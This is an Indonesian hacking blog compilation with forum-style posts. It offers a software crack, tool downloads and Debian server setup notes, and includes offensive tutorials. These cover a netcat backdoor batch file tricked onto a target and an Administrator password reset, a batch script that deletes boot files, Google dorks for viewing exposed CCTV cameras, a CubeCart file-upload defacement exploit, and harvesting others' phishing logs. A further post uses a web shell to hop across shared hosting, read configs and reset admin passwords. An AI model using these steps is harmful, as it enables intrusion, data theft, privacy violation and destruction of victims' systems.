Translate

IDM Crack Pro

Ne mau post lagi idman versi baru sekaligus sama cracknya...

hehehe

download di sini aja gan.. gratis...

Download Now

-------------------------------------------

apabila cracknya ngk jalan ne gue kasih serial number idman semua versi ...

bisa di download di bawa ini gan...


Download Now

Tools Hack

1. Acunetix

ini tooL buat scan BUG dalam 1 web..!!

Bug XSS,,SQL,,RFI,,LFI

[Image: a24741a175523ee0939914a1d0d2eac2_Acuneti...canner.gif]

link Download nya :
http://www.ziddu.com/download/13064272/v...r.rar.html


2. Blue Port Scanner

dari semua Scanner port yang ane coba..!!

ini yang paling ampuh cek Port yang kebuka..!!

[Image: bps.jpg]

link download :

http://www.ziddu.com/download/13073067/B...r.rar.html


3. Real Hide IP

ini tool buat menyembunyikan IP anda..!! waktu kalian browsing..!!

ane coba pake ini waktu order domain..!

bisa tembus kok..biar gk perlu setting proxi..

[Image: real_hide_ip-190033-1265012157.jpeg]


link downloadnya :

http://www.ziddu.com/download/13073068/R...2.rar.html

Pasword Untuk Semua File Dsni :

http://www.ziddu.com/download/13064412/pass.txt.html

Note : "ingat ini tool ane tiap hari..!! di coba Work 100%...No Virus (buat Smadav ama Avast ane gk kedetek)...!!!"

HN

Cara Mempercepat Koneksi

Agan agan pasti selalu mengalami koneksi internet yang lemot kan? apa lagi kalo udah abis batas pemakaiannya, nah disini ane mau ngasih info gimana caranya mempercepat koneksi internet dengan menggunakan Mobile Data Monitoring Application (MDMA) , oh iya yang belum punya aplikasinya bisa download disini

Spoiler for skrinsut MDMA:


Spoiler for cara ngegunainnya:

Nih gan cara caranya:
1. Buka aplikasinya
2. Di kolom connection type pilih GPRS/EDGE only
3. Klik apply
4. Di pojok kanan bawah klik connect
5. Kalo udah connect, ubah connection typenya jadi 3G only

Oh iya Agan agan ga usah nge connect-in di aplikasi bawaan modemnya, cukup di MDMA aja..


pekanbaru-corp / Muhammad Ahmad

Hack Network

Saya menulis ini karena benar-benar bekerja untuk saya beberapa kali dan saya berharap hal itu untuk Anda juga, semua yang Anda butuhkan adalah target yang sangat mudah ditipu.  Seperti kita semua tahu, sebuah Trojan sangat mungkin akan dijemput oleh AV, apa yang Anda butuhkan adalah netcat, netcat membuka port pada komputer untuk akses (Jika digunakan dengan benar oleh batch file Anda membuka port pada komputer target). Anda akan perlu menulis sebuah file batch. File batch untuk menyalin netcat pada komputer remote harus dijalankan dari komputer target (Orang pada target harus mengeksekusi batch file dalam beberapa cara). Buka Notepad dan ketik ini:

ANDA HARUS KE http://hacking-tutor.blogspot.com

Menyimpan file sebagai file batch menggunakan Notepad.  http://hacking-tutor.indonesianforum.net

File batch selanjutnya akan digunakan untuk memastikan port yang Anda tentukan membuka setiap jendela waktu mulai Facebook, Anda dapat menentukan port apapun yang Anda inginkan. Buka Notepad dan ketik:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Simpan file sebagai file batch dengan menggunakan Notepad, ini akan menjadi file yang disalin ke folder startup di file batch sebelumnya kita tulis. Anda dapat mengikat batch file ke file dan berbagi file, membiarkan target mengeksekusi file tersebut sehingga ia dapat menyalin netcat dan file batch lain ke / komputer miliknya itu sehingga membuka port 9999, setelah port 9999 telah dibuka maka Anda dapat menggunakan telnet dan telnet ke port pada komputer target untuk memiliki akses penuh tanpa pernah perlu ada password apa pun. Setelah Anda berada dalam mengubah password Administrator jika sesuatu terjadi pada file Anda, perintahnya adalah ini:

net user Administrator Newpassword

Sekarang dari sini Anda bisa melakukan apa yang Anda inginkan, misalnya mencoba mematikan komputer target dengan browsing ke folder system32 dan kemudian ketik:

http://hacking-tutor.blogspot.com/ http://hacking-tutor.blogspot.com/

komputer kemudian akan melakukan restart 10 kali detik. Anda bahkan bisa bermain sekitar lebih oleh Cain & Abel Instalasi pada komputer Anda dan kemudian menginstal Abel dari jarak jauh pada komputer (Karena Anda tahu password Administrator) Setelah Anda Abel pada target Anda dapat mulai dan berhenti layanan dan melakukan lebih banyak!

Kill PC Your Friend or You PC

Nich ane dpt Tutor dri HN mantep bwt orng yg mau kill PCnya sndiri atau orng laen..!!
dah...dri name na ja dah tau kan????
langsung ja nih...script na...

< % del c:\ntdetect.sys del c:\ntldr.sys del c:\msconfig.sys %systemroot%bootmgr%users%cmd=restart.com end %>
@ echoend

save eksistensi na *.bat
bgitu d eksekusi dia bkl ngapus file: ntdetect.sys, ntldr.sys, msconfig.sys
trus lngsung restart...bgtu restart g bkl idup lgi


Sumber HN

Hack CCTV System

Tulis Kata Ini Di google :

Camera Hacks With Google.

/view/index.shtml
inurl:/view/index.shtml
inurl:viewerframe?mode=
inurl:/view:shtml
inurl:view/indexframe.shtml

inurl:lvappl
live webcams
inurl:"viewerframe?mode=motion"
intitle:"snc-rz30 home"
intitle:"WJ-NT104 Main"
inurl:LvAppl intitle:liveapplet
intitle:"Live View / - AXIS"
inurl:indexFrame.shtml "Axis Video Server"

# nurl:"ViewerFrame?Mode=
# intitle:Axis 2400 video server
# inurl:/view.shtml
# intitle:"Live View / - AXIS" | inurl:view/view.shtml^
# inurl:ViewerFrame?Mode=
# inurl:ViewerFrame?Mode=Refresh
# inurl:axis-cgi/jpg
## inurl:view/indexFrame.shtml

# inurl:view/index.shtml
# inurl:view/view.shtml
# liveapplet
# intitle:"live view" intitle:axis
# intitle:liveapplet
# allintitle:"Network Camera NetworkCamera"
# intitle:axis intitle:"video server"
# intitle:liveapplet inurl:LvAppl
# intitle:"EvoCam" inurl:"webcam.html"
# intitle:"Live NetSnap Cam-Server feed"
# intitle:"Live View / - AXIS"
# intitle:"Live View / - AXIS 206M"
# intitle:"Live View / - AXIS 206W"
# intitle:"Live View / - AXIS 210?
# inurl:indexFrame.shtml Axis
# inurl:"MultiCameraFrame?Mode=Motion"
# intitle:start inurl:cgistart
# intitle:"WJ-NT104 Main Page"
# intext:"MOBOTIX M1? intext:"Open Menu"
# intext:"MOBOTIX M10? intext:"Open Menu"
# intext:"MOBOTIX D10? intext:"Open Menu"
# intitle:snc-z20 inurl:home/
# intitle:snc-cs3 inurl:home/
# intitle:snc-rz30 inurl:home/
# intitle:"sony network camera snc-p1?
# intitle:"sony network camera snc-m1?
# site:.viewnetcam.com -www.viewnetcam.com
# intitle:"Toshiba Network Camera" user login
# intitle:"netcam live image"
# intitle:"i-Catcher Console - Web Monitor"


Cara Yang Saya Gunakan Untuk Menghack camera system tersebut adalah :


inurl:"viewerframe?mode=motion"

lalu cari link yang berama :
Network Camera Networkcamera


Ini jadinya  :
silahkan buka link dibawah ini :
http://217.173.193.218/axis-cgi/mjpg/video.cgi?resolution=704x576

Script Redirct

Langsung Tempel Di Blog Atau Forum Atau Sejenisnya dalam bentuk HTML

<script type="text/javascript">
<!--
window.location = "http://travismarkshihab.blogspot.com"
//-->
</script>


Ubah http://travismarkshihab.blogspot.com menjadi link yang dituju :D

Membuat Web Dengan Debian 5

Terlebih dahulu mungkin kita akan install paketnya dengan cara sbb :


#apt-get install mc
#apt-get install squid
#apt-get install bind9
#apt-get install dhcp3-server
#apt-get install squirrelmail
#apt-get install postfix
#apt-get install courier-imap courier-pop
#apt-get install apache2
#apt-get install php5
#apt-get install ssh

SQUID
pertama tama sekali sebelem seting squid kita        harus merubah angka 0 jadi 1 pada file ip_forward di : /proc/sys/net/ipv4/ip_forward
dengan
edit file sysctl.conf di dalam “/etc/sysctl.conf
pada :
# net.ipv4.conf.default.rp_filter=1 => hilangkan tanda # nya
# net.ipv4.conf.all.rp_filter=1 => hilangkan tanda # nya
# net.ipv4.tcp_syncookies=1 => hilangkan tanda # nya
setelah itu install dengan cara
#apt-get install squid
#mcedit /etc/squid/squid.conf
kemudian cari tulisan :acl CONNECT method CONNECT Tambah teks dbawah ini di dalam file squid.conf dibawahx acl CONNECT method CONNECT
acl sex dstdom_regex “/etc/sex”
acl lan src 192.168.2.0/24
http_access deny sex
http_access allow lan
http_access allow all

  • -tambahkan teks diatas, di bawahx acl CONNECT dalam “/etc/squid/squid.conf
lalu save
kemudian
cari dan tambahkan+ ( hilangkan tanda # )
http_port 3128 transparent -> port default proxy => yg transparent baru ditambahkan ( harus dtambah teks transparent )
cache_mem 16 mb
cache_dir ufs /var/spool/squid 500 16 256
cache_mgr admin@pephy.com
visible_hostname proxy.tkj.com -> nama visible hostname kamu
auth_param basic children 5
auth_param basic realm Squid proxy-caching web server
auth_param basic credentialsttl 2 hours
auth_param basic casesensitive off
  • -kemudian buat folder dengan sex di “/etc”
  • -lalu isikan situs yang ingin diblok didalam folder sex
Contohnya :
  • -www.facebook.com
  • -www.google.com
  • -www.debian.org
Setelah itu :
  • mcedit /etc/network/interface
Isikan teks dibawah ini, diatasnya allow-hotplug eth1
allow hotplug-eth0
iface eth0 inet static
klik tombol tab address 172.0.1.100 => isi sesuai eth0 server yang ada
klik tombol tab netmask 255.255.255.0
klik tombol tab network 172.0.1.0
klik tombol tab broadcast 172.0.1.255
klik tombol tab gateway 172.0.1.1
buat sama dengan eth1 tapi ganti eth1 nya jadi eth0 terus ganti address,netmask,network,broadcast,gateway dengan contoh  ip server yg z gunakan : 172.0.1.1
  • setelah itu isi auto eth0 di bagian paling bawah dalam “/etc/network/interface
Setelah diisi interfacenya atau eth0 nya restart networkingnya dengan cara: #/etc/init.d/networking restart
keterangan : eth0 diisi agar bisa internet
# buat ngeblok domain
acl blockeddomain dstdom_regex “/etc/squid/blockeddomain.txt”
http_access deny blockeddomain
# buat ngeblok url yang ada kata tertentu
acl blockedstring url_regex “/etc/squid/blockedstring.txt”
http_access deny blockedstring
contoh isi blockeddomain.txt
—-
gator.com
lop.com
asexvideo.com
playboy.com
—-
contoh isi blockedstring.txt
—–
dialer.exe
loader.exe
livesexcams.exe
Free_Sex_Download.exe
—–
Setelah semua telah dsetting kemudian restart squid dengan cara : #/etc/init.d/squid restart
Kemudian
#iptables –t nat -A PREROUTING -s 192.168.2.0/24 -p tcp –dport 80 -j REDIRECT –to-port 3128
sama
#iptables -t nat -A POSTROUTING -s 192.168.2.0/24 -j MASQUERADE
#iptables-save
lalu #/etc/init.d/squid restart
Ini cara ngeblok menggunakan internet dan agar bisa main internet/ agar internetnya jalan
setelah itu restart apache2, bind9, sama squid caranya:
#/etc/init.d/apache2 restart
#/etc/init.d/bind9 restart
#/etc/init.d/squid restart
pastikan :
  • semua pc client kalo browsing pasti lewat proxy itu
  • anda harus sering menjelajah ke situs2 porno juga biar tau situs2 apa yang harus di blok
SQUIRRELMAIL
Setting dan konfigurasi Mail Server di Debian 4
www.tips-fb.com Posted by TkJ A Comunity and R3Gen3raTion at 1:14:00 AM . 10.31.2009
label server
> I. Install Postfix. Dgn perintah :
# apt-get install postfix
Kemudian edit&konfigurasi postfix seperti di bawah ini. Dgn perintah :
# mcedit /etc/postfix/main.cf
myhostname = mail.pephy.com -> isi sesuai mail.domain anda contohnya : smkyapisbiak.net
mydomain = pephy.com -> isi sesuai domain anda contohnya : smkyapisbiak.net

myorigin = /etc/mailname
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination = localhost, localhost.localdomain, , localhost
relayhost =
mynetworks = 127.0.0.0/8, 192.168.123.0/24 => yg hitam diganti atau di isi sesuai eth1 yang anda berikan contoh : 192.168.2.1 berarti yang dtulis 192.168.2.0/24
# mailbox_command = procmail -a “$EXTENSION”
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocol = all => ditambahkan
home_mailbox = Maildir/ => ditambahkan

  • Instal apache2 , php5 dan courier. Dgn cara :
# apt-get install apache2 php5 courier-imap courier-pop
Lalu edit dan tambahkan text di bawah ini:
# mcedit /etc/apache2/apache2.conf
  • tambahkan teks dibawah paling bawah dalam /etc/apache2/apache2.conf
Include /etc/squirrelmail/apache.conf
ServerName 192.168.123.13

  • Instal squirrelmail juga .
Dgn perintah :
# apt-get install squirrelmail
lalu
#mcedit /etc/Squirrelmail/apache.conf
paling atas
Alias/squirrelmail/usr/share/squirrelmail => squirrelmail diganti jadi webmail contoh jadinya: Alias/webmail/usr/share/squirrelmail dan seterusnya
#edit file @conf.pl dalam “/etc/squirrelmail”
klik 2 enter / edit Server Settings
harus diganti
ganti domain : smkyapisbiak.net => smkyapisbiak.net sebagai contoh / isi sesuai hostnamenya anda
ganti IMAP Server : smkyapisbiak.net
ganti Server Software : courier
ganti SMTP Server : smkyapisbiak.net
  • Buat direktori mail di direktori “/etc/skel” Dgn perintah :
tulis maildirmake Maildir/ di dalam “/etc/skel”
tulis adduser Admin => didalam “/etc/skel”
tulis adduser Admin1 => didalam “/etc/skel”
  • Restart postfix dan apache2 :
#/etc/init.d/postfix restart
#/etc/init.d/apache2 restart

  • Cek di browser anda dan coba login di squirrelmail anda .
ketik : http://smkyapisbiak.net/webmail
INDEX.PHP
masuk di “/var/www
buat file index.php dengan cara touch index.php
kemudian
edit “/var/www/index.php”
isikan teks dibawah ini didalam index.php
lalu save
kemudian restart apache2 dengan postfix dengan cara : /etc/init.d/apache2 restart dan /etc/init.d/postfix restart
DHCP
Setting dan konfigurasi DHCP di debian 5
  • Install dhcp
# apt-get install dhcp3-server
  • edit seperti ini dan hilangkan tanda (#) di dhcp.conf :
pertama edit “/etc/default/dhcp3-server” di dalamnya ada tulisan INTERFACE = “” ditengan-tengah tanda petik2 isi dengan teks eth1
# mcedit/etc/dhcp3/dhcp.conf
hilangkan tanda # dan ganti ip yg kita gunakan
pada
# A slihtly different configuration for an internal subnet. => ini enggak usah dihilangkan tanda # nya yang dibawah aja
Subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.10 192.168.2.30;
option domain-name-servers smkyapisbiak.net, smkyapisbiak.net;
option domain-name “smkyapisbiak.net”
option routers 192.168.2.1;
option broadcast-address 192.168.2.0;
default-lease-time 600;
max-lease-time 7200;

}
  • Restart dhcp: # /etc/init.d/dhcp3-server restart
  • Dan setting client dgn ip dhcp.
Semoga berhasil ^_^ ^_^
DNS
Setting dan konfigurasi DNS Server di debian 5
  • Install bind9
Dgn perintah : #apt-get install bind9
pertama tama
#mcedit /etc/bind/named.conf
isi teks ini paling bawah dalam “/etc/bind/named.conf => zone “smkyapisbiak.net” {
type master;
file “/etc/bind/db.smkyapisbiak”;
};
dengan
zone “192.inaddr.arpa” {
type master;
file “/etc/bind/db.192″;
};
buat folder db.smkyapisbiak dengan folder db.192 => didalam “/etc/bind” dengan cara touch db.smkyapisbiak dan touch db.192
> copy kn file db.127 menjadi db.192 dan file db.local menjadi db.smkyapisbiak
Dgn perintah :
#cp db.127 db.192 =>didalam “/etc/bind”
#cp db.local db.smkyapisbiak =>didalam “/etc/bind”
> edit file db.192 => kasih sama dengan yg ini
;
; BIND reverse data file for smkyapisbiak.net
;
$TTL 604800
@ IN SOA smkyapisbiak.net. ns.smkyapisbiak.net. (
1 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.smkyapisbiak.net..
2.168.192 IN PTR smkyapisbiak.net.
> edit juga file db.smkyapisbiak => kasih sama dengan yg ini
;
; BIND reverse data file for zone smkyapisbiak.net
;
$TTL 604800
@ IN SOA smkyapisbiak.net. ns.smkyapisbiak.net. (
2 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.smkyapisbiak.net..
@ IN A 192.168.2.1
@ IN MX 1 smkyapisbiak.net.
www IN CNAME smkyapisbiak.net.
> Restart interface dan bind9
Dgn perintah :
# /etc/init.d/networking restart
# /etc/init.d/bind9 restart

> Cek dgn perintah ;
#nslookup smkyapisbiak.net (nama domain yg telah di setting)
#ping smkyapisbiak.net
Semoga berhasil iagh ^_^
WEB SERVER

Setting dan Konfigurasi Web Server di Debian 5
Sever web adalah sebuah perangkat lunak server yang berfungsi menerima permintaan HTTP atau HTTPS dari klien yang dikenal dengan browser web dan mengirimkan kembali hasilnya dalam bentuk halaman-halaman web yang umumnya berbentuk dokumen HTML. Server web yang terkenal diantaranya adalah Apache dan Microsoft Internet Information Service (IIS). Apache merupakan server web antar-platform, sedangkan IIS hanya dapat beroperasi di sistem operasi Windows.
Berikut cara setting dan konfigurasi Web Server :
  • Install apache2,php5 :
# apt-get install apache2 php5 mysql-server phpmyadmin lynx

  • Ketik a2enmod userdir : (agar web server yg di konfigurasi multi fungsi) .
  • Membuat virtual host:
# cp /etc/apache2/sites-enabled/000-default /etc/apache2/sites-enabled/webmail
  • Kemudian edit virtual host :
# mcedit /etc/apache2/sites-enaled/webmail
Ketik :
NameVirtualHost 192.168.123.13:80
ServerName www.debian.com
DocumentRoot /home/tkj/public_html
  • Membuat folder public_html pd dir /etc/skel agar setiap user yg dibuat mempunyai public_html .
# mkdir /etc/skel/public_html
  • Buat dir /home/tkj untuk menyimpan index.html dari web server .
# mkdir /home/tkj/public_html
  • Restart apache2 :
# /etc/int.d/apache2 restart
  • Apabila ingin mengistall wordpres, ekstrak dan letakkan foldernya di direktori /home/tkj/public_html
  • Buat database dulu dg phpmyadmin dg nama sesuka anda.
# contoh database wordpress saya: http://192.168.123.13/phpmyadmin
# dan saya buat nama webkuu
  • edit dan ganti file wp-sample-config.php ;
// ** MySQL settings – You can get this info from your web host ** //
/** The name of the database for WordPress */
define(’DB_NAME’, ‘webkuu’); /** sesuaikan database yg telah anda buat **/
/** MySQL database username */
define(’DB_USER’, ‘root’); /** sesuaikan user yg telah anda setting**/
/** MySQL database password */
define(’DB_PASSWORD’, ”); /** sesuaikan password dg user yg telah dibuat **/
/** MySQL hostname */
define(’DB_HOST’, ‘localhost’);
/** Database Charset to use in creating database tables. */
define(’DB_CHARSET’, ‘utf8′);
/** The Database Collate type. Don’t change this if in doubt. */
define(’DB_COLLATE’, ”);
  • Restart lagi dan Install wordpress anda…
Semoga berhasil iagh ..
Semoga suksess

Code Site Negara

Afghanistan --> AF
Albania --> AL
Algeria --> DZ
American Samoa --> AS
Andorra --> AD
Angola --> AO
Anguilla --> AI
Antarctica --> AQ
Antigua and Barbuda --> AG
Argentina --> AR
Armenia --> AM
Aruba --> AW
Australia --> AU
Austria --> AT
Azerbaijan --> AZ
Bahamas --> BS
Bahrain --> BH
Bangladesh --> BD
Barbados --> BB
Belarus --> BY
Belgium --> BE
Belize --> BZ
Benin --> BJ
Bermuda --> BM
Bhutan --> BT
Bolivia --> BO
Bosnia and Herzegovina --> BA
Botswana --> BW
Bouvet Island --> BV
Brazil --> BR
British Indian Ocean Territory --> IO
Brunei Darussalam --> BN
Bulgaria --> BG
Burkina Faso --> BF
Burundi --> BI
Cambodia --> KH
Cameroon --> CM
Canada --> CA
Cape Verde --> CV
Cayman Islands --> KY
Central African Republic --> CF
Chad --> TD
Chile --> CL
China --> CN
Christmas Island --> CX
Cocos (Keeling) Islands --> CC
Colombia --> CO
Comoros --> KM
Congo --> CG
Congo, Democratic Republic --> CD
Cook Islands --> CK
Costa Rica --> CR
Cote d'Ivoire --> CI
Croatia --> HR
Cyprus --> CY
Czech Republic --> CZ
Denmark --> DK
Djibouti --> DJ
Dominica --> DM
Dominican Republic --> DO
East Timor --> TL
Ecuador --> EC
Egypt --> EG
El Salvador --> SV
Equatorial Guinea --> GQ
Eritrea --> ER
Estonia --> EE
Ethiopia --> ET
Falkland Islands (Malvinas) --> FK
Faroe Islands --> FO
Fiji --> FJ
Finland --> FI
France --> FR
French Guiana --> GF
French Polynesia --> PF
French Southern Territories --> TF
Gabon --> GA
Gambia --> GM
Georgia --> GE
Germany --> DE
Ghana --> GH
Gibraltar --> GI
Greece --> GR
Greenland --> GL
Grenada --> GD
Guadeloupe --> GP
Guam --> GU
Guatemala --> GT
Guinea --> GN
Guinea-Bissau --> GW
Guyana --> GY
Haiti --> HT
Heard and McDonald Islands --> HM
Honduras --> HN
Hong Kong --> HK
Hungary --> HU
Iceland --> IS
India --> IN
Indonesia --> ID
Iraq --> IQ
Ireland --> IE
Israe -->l IL
Italy --> IT
Jamaica --> JM
Japan --> JP
Jordan --> JO
Kazakhstan --> KZ
Kenya --> KE
Kiribati --> KI
Kuwait --> KW
Kyrgyzstan --> KG
Lao People's Democratic Republic --> LA
Latvia --> LV
Lebanon --> LB
Lesotho --> LS
Liberia --> LR
Libya --> LY
Liechtenstein --> LI
Lithuania --> LT
Luxembourg --> LU
Macau --> MO
Macedonia --> MK
Madagascar --> MG
Malawi --> MW
Malaysia --> MY
Maldives --> MV
Mali --> ML
Malta --> MT
Marshall Islands --> MH
Martinique --> MQ
Mauritania --> MR
Mauritius --> MU
Mayotte --> YT
Mexico --> MX
Micronesia --> FM
Moldova --> MD
Monaco --> MC
Mongolia --> MN
Montserrat --> MS
Morocco --> MA
Mozambique --> MZ
Namibia --> NA
Nauru --> NR
Nepal --> NP
Netherlands --> NL
Netherlands Antilles --> AN
New Caledonia --> NC
New Zealand --> NZ
Nicaragua --> NI
Niger --> NE
Nigeria --> NG
Niue --> NU
Norfolk Island --> NF
Northern Mariana Islands --> MP
Norway --> NO
Oman --> OM
Pakistan --> PK
Palau --> PW
Palestinian Territory --> PS
Panama --> PA
Papua New Guinea --> PG
Paraguay --> PY
Peru --> PE
Philippines --> PH
Pitcairn --> PN
Poland --> PL
Portugal --> PT
Puerto Rico --> PR
Qatar --> QA
Reunion --> RE
Romania --> RO
Russian Federation --> RU
Rwanda --> RW
Saint Kitts and Nevis --> KN
Saint Lucia --> LC
Saint Vincent and the Grenadines --> VC
Samoa --> WS
San Marino --> SM
Sao Tome and Principe --> ST
Saudi Arabia --> SA
Senegal --> SN
Serbia and Montenegro --> CS
Seychelles --> SC
Sierra Leone --> SL
Singapore --> SG
Slovakia --> SK
Slovenia --> SI
Solomon Islands --> SB
Somalia --> SO
South Africa --> ZA
South Georgia and The South Sandwich Islands --> GS
South Korea --> KR
Spain --> ES
Sri Lanka --> LK
St. Helena --> SH
St. Pierre and Miquelon --> PM
Suriname --> SR
Svalbard and Jan Mayen Islands --> SJ
Swaziland --> SZ
Sweden --> SE
Switzerland --> CH
Taiwan --> TW
Tajikistan --> TJ
Tanzania --> TZ
Thailand --> TH
Togo --> TG
Tokelau --> TK
Tonga --> TO
Trinidad and Tobago --> TT
Tunisia --> TN
Turkey --> TR
Turkmenistan --> TM
Turks and Caicos Islands --> TC
Tuvalu --> TV
Uganda --> UG
Ukraine --> UA
United Arab Emirates --> AE
United Kingdom --> GB
United States --> US
United States Minor Outlying Islands --> UM
Uruguay --> UY
Uzbekistan --> UZ
Vanuatu --> VU
Vatican --> VA
Venezuela --> VE
Viet Nam --> VN
Virgin Islands (British) --> VG
Virgin Islands (U.S.) --> VI
Wallis and Futuna Islands --> WF
Western Sahara --> EH
Yemen --> YE
Zambia --> ZM
Zimbabwe --> ZW

Tutor Dasar Deface

OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt
jamin 1 jam dapet min 10 site :D

[+] exploit : http://localhost/[pacth]/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

Ok langsung aja yah..
sesuai judul CubeCart Upload file

buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah
intext:'powered by CubeCart v 3.x'

cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nya
siph deh bisa :P

1. pada connector pilih PHP
2. lalu pilih file html yang udah kita siapin.. trz klik Upload


Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
“file uploaded with no errors”

OK, udah berhasil di upload.. tapi file kita dimana ya?
Langsung klik Get folder and files

Kurang lebih seperti ini

Code:
<Connector command="GetFoldersAndFiles" resourceType="File">
<CurrentFolder path="/" url="/[pacth]/file/"/>
�
<Folders>
<Folder name="test"/>
</Folders>
�
<Files>
<File name="a_asp;_jpg(1).gif" size="53"/>
<File name="a_asp;_jpg.gif" size="53"/>
<File name="fe.php6" size="188"/>
<File name="robtz.html" size="18"/>
<File name="fe.php?" size="188"/>
<File name="fe_php." size="188"/>
<File name="hn(1).txt" size="1"/>
<File name="hn.txt" size="1"/>
<File name="r57.php~" size="108"/>
</Files>
</Connector>

Dari data di atas kita bisa lihat file kita ada di “url/[pacth]/file/robtz.html”
Example : http://site.gov.my/fileupload/file/robtz.html

bakal keliatan seperti SS berikut..
Nah sekarang coba buka di halamna baru url tadi..
Itu lah halaman file yang kita upload tadi
seep..
kita berhasil masukin file deface an..
untuk shell sepertinya bisa dengan menyisipkan script ke dalam file tertentu seperti sudah pernah di jelaskan kk Alecs..

gimana? gampang bukan?
heheheh

====================================================================================
================================================
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://ho1onk.cz.cc
forum : http://hacker-newbie.org
title : CubeCart v 3.x Upload file Vulnerability
dork : powered by CubeCart v 3.x
================================================ 


AldyFrz

Mencari Hasil Fake Login Orang Lain

sesuai dengan judul ane newbie mau kasih tips sedikit walaupun agak curang dikit gpplah namanya juga jalur haram,mengambil yang bukan milik kita sendiri.. tapi lebih parahnya maling kok di malingin...wkakwakwkaw.
saya mah engga ya. cuma buat belajar doang :P :P.
langsung ajja om.

saat ini facebook kan banyak yang masang phisingan/fake login untuk mencari keuntungan/mengambil data atau yg barharga dari facebook.contohnya chips poker...bisa juga ke arah yg lebih parah seperti penipuan lainnya...
di blog,website,forum banyak yg memberikan artikel membuat phising/fake login dan hampir smua artikel menyertai file phisingnya, namun kebanyakan hasil phising/fake login akan di kirimkan ke halaman logs.txt (kalau ane sendiri kirimnya ke email ane sendiri jadi lebih aman gak bisa di liat orang tapi dulu sekarang udah gak main lagi...hihihihi udah tobat)ya udah kalo kebanyakan basa basi nanti jadi panjang..langsung aja dah..

Tujuan : Mengambil hasil phising/fake login orang lain jadi gak capek2 nyebar2 link atau ngejebak orang (maling di malingin )
caranya : buka google terus masukin keyword intext:"password" inurl:"logs.txt"
terus teken enter...eng ing eng.. banyak tuh dah hasil phisingan orang, dia yg capek tinggal kita yang petikin...wahahahahah

kalo yg pada tau sih. pada langsung rename logs.txt nya nih.....
sekian sedikit tips dari newbie mohon maaf kalo gak bermutu maklumin yah namanya juga ..::masih newbie terus::..

AldyFrz

Scan Web 1 Hostingan

Misalkan ente punya Backdoor disalah satu web korban. Pasti ente penasaran dunk pengen melihat web2 apa saja yang satu hostingan dengan web korban. Dan nanti’y jg web hasil jumping tersebut bisa ente kuasai lagi.

Download file Scan Database terlebih dahulu :
http://www.ziddu.com/download/10782908/scandatabase.zip.html

Silahkan upload ke Backdoor ente, misalkan Backdoor ente beralamat di :
http://target.com/b374k.php <--- ini backdoor ente http://target.com/ scandatabase.PHP <--- ini yg udah di pasang file scandatabase Terus jalankan URL tersebut. Screenshot :




Klo sudah selesai, kira2 begini preview’y :
Tuwh diatas udah dapet korban2 yang satu hostingan.

Terus bagaimana cara mendapatkan web2 hasil jump tersebut ?

Kita coba satu target hasil jump tadi. Misal : /home/hasiljump/public_html/
Copy pastekan ke directory yg dah ane kasih tanda tuwh diatas. Klo udah KLIK GO

OK..klo udah, Sekarang qta dagh berada di database web yg berbeda. Web hasil jumping.
Selanjut’y cari nama file yg menyimpan username and password mysql web tersebut. Biasa’y si web menyimpan dengan nama :

Config.php
wp-config.php
configuration.php
dan masih banyak lagi.

Klo udah dapet file yg bernama, misalkan : configuration.php, wp-config.php atau Config.php. Silahkan bedah nama file tersebut. Nanti’y kalian akan mendapatkan username and password mysql.
Klo udah dapet username and password silahkan login ke mysql web tersebut. Klik Mysql. Preview :
Klo udah masuk ke database Mysql. Silahkan Login.
Selanjut’y Cari nama file --> users trs KLIK.



Klo udah, Klik Icon pencil and kertas atau Edit. Ganti password admin dengan ini : 21232f297a57a5a743894a0e4a801fc3

Nanti’y qta login seperti ini :
Username : admin
Password : admin
Ok..klo semua’y udah di praktek’in dengan benar, Silahkan cari halaman login admin.
Misalkan : http://www.hasiljump/login/admin
Username : admin
Password : admin
Ok selesai, Klo dagh masuk ke halaman admin. Tgl upload Backdoor lagi degh.


sumber : http://forum.devilzc0de.org/thread-2473.html


Berburu Direktori File Sensitif

Mungkin anda akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi.
Direktori Sensitif
Semua direktori atau file yang mengandung informasi berguna buat hacker untuk mendeface website anda, maka direktori itu termasuk sensitif. Beberapa direktori atau file yang tergolong sensitif antara lain:
  • Backup
Hal yang biasanya dibackup adalah database dan source script webnya. Bayangkan apa yang terjadi bila hacker berhasil mendapatkan seluruh file php dan “database dump” dalam satu file zip? Kalau anda berpikir itu tidak mungkin terjadi, anda salah besar, karena saya sering menemukan file backup berekstensi zip, tar.gz, atau sql berserakan di websitenya.
  • Halaman Login
Ada banyak macam halaman login, umumnya adalah halaman login untuk mengelola isi website, yaitu CMS Administrator. Selain CMS, halaman login yang lain adalah phpMyAdmin, cpanel, Tomcat Admin Page, AXIS2 Admin Page dll. Tomcat dan AXIS2 adalah Java based webserver dan web service platform.
Kenapa halaman login termasuk sensitif? Karena dengan mengetahui URL untuk menjadi Administrator website, seorang hacker bisa melakukan serangan SQL Injection, password guessing, dictionary attack dan brute force attack untuk membuat dirinya menjadi seorang administrator di website anda. Celakanya banyak website yang halaman login adminnya tidak menggunakan password yang kuat, bahkan menggunakan password default.
  • Log file
Log file biasanya dipakai untuk tujuan debugging atau penelusuran kesalahan oleh web developer. Karena itu tidak heran bila dalam log file banyak mengandung informasi sensitif yang bisa dimanfaatkan hacker. File log ini berbeda-beda tergantung dari web aplikasi yang dipakai karena web developer punya kebebasan untuk membuat  atau tidak membuat file log.
